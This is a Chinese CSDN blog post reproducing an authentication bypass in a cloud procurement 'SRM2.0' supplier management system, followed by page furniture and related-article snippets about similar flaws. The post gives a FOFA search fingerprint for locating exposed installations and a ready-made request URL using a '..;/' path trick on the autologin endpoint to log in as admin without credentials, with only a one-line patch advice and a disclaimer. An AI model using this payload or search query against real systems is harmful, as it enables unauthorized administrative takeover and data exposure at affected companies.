某云彩SRM2.0后台绕过漏洞

最新推荐文章于 2024-09-12 18:05:36 发布
最新推荐文章于 2024-09-12 18:05:36 发布
阅读量379 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/141924172
版权

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。
该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

在这里插入图片描述

修复建议

更新到最新版本

抠脚大汉在网络
关注
专栏目录
智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现
0xSec
08-16 906
智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
智联云采 SRM2.0 autologin 身份认证绕过漏洞复现
0xSec
09-02 421
由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。
云彩SRM2.0任意文件下载漏洞
一个努力学习网安的小牛马
09-05 523
某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。该系统download在接口处存在任意文件下载漏洞
智联云采SRM2.0 身份认证绕过
iSee857的博客
09-03 268
智联云采SRM2.0存在身份认证绕过漏洞,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台。关闭外网访问权限 限制问题接口权限访问。
漏洞复现」智联云采 SRM2.0 autologin 身份认证绕过漏洞
qq_39894062的博客
09-12 335
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞复现】某联云采 SRM2.0 download 任意文件读取漏洞
weixin_54799594的博客
08-29 551
漏洞复现】某联云采 SRM2.0 download 任意文件读取漏洞
SRM2.0合同数量及金额订单管控-FS.docx
11-10
SRM2.0合同数量及金额订单管控-FS.docx
Microsoft Outlook 2007 Datasheet_CN_Final.doc
10-11
Microsoft Outlook 2007 Datasheet_CN_Final.doc
45_Normalized3secfade.wav
10-11
45_Normalized3secfade.wav
Python本科毕业设计基于协同过滤的图书推荐系统源码+数据库(高分项目)
10-11
Python本科毕业设计基于协同过滤的图书推荐系统源码+数据库(高分项目),本项目是一套98分毕业设计系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业,包含:项目源码、项目说明等。该项目可以直接作为毕设使用,项目都经过严格调试,确保可以运行! Python本科毕业设计基于协同过滤的图书推荐系统源码+数据库(高分项目),本项目是一套98分毕业设计系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业,包含:项目源码、项目说明等。该项目可以直接作为毕设使用,项目都经过严格调试,确保可以运行!Python本科毕业设计基于协同过滤的图书推荐系统源码+数据库(高分项目),本项目是一套98分毕业设计系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业,包含:项目源码、项目说明等。该项目可以直接作为毕设使用,项目都经过严格调试,确保可以运行!Python本科毕业设计基于协同过滤的图书推荐系统源码+数据库(高分项目),本项目是一套98分毕业设计系统。
基于深度学习LeNet-5模型的图像分类系统python源码,准确率99.12%.zip
10-11
基于深度学习LeNet-5模型的图像分类系统python源码,准确率99.12%.zip 这是一个本科生毕业设计项目,主要实现了图像分类的功能。项目使用了深度学习技术,采用了LeNet-5模型,并对数据进行了清洗和预处理。经过测试,模型的准确率达到了99.12%。 主要功能点 实现图像分类功能 采用LeNet-5模型进行深度学习 对数据进行清洗和预处理 技术栈 Python 深度学习 LeNet-5模型
一个棋盘生成器和基于MNIST数据集的棋盘识别模型+使用说明.zip
10-11
一个棋盘生成器和基于MNIST数据集的棋盘识别模型+使用说明.zip 这个项目是毕业设计项目。它主要包含了一个棋盘生成器和一个基于MNIST数据集的棋盘识别模型。项目使用了Python、C++和Prolog等技术栈,并提供了相关的安装和运行说明。 主要功能点 棋盘生成器: 能够生成各种棋盘图像 棋盘识别模型: 基于MNIST数据集训练的棋盘识别模型 技术栈 Python C++ Prolog NumPy TensorFlow Keras
模块化主动隔振系统,全球前16强生产商排名及市场份额(by QYResearch).pdf
10-11
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。 邮箱:market@qyresearch.com
基于python的绿幕抠图+双层抠图+多线程+高分源码.zip
最新发布
10-11
基于python的绿幕抠图+双层抠图+多线程+高分源码.zip个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高分项目,评审分98分。主要针对计算机相关专业和需要项目实战练习的学习者,也可作为课程设计、期末大作业。个人经导师指导并认可通过的高
组织结构图.vsd
10-11
组织结构图.vsd
SRM-MDM Catalog 2.0 安装指南
"SRM-MDM Catalog 2.0 Component Installation Guide 是一份面向技术顾问和系统管理员的文档,旨在指导他们进行SAP SRM(Supplier Relationship Management)与MDM(Master Data Management)目录组件的安装。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值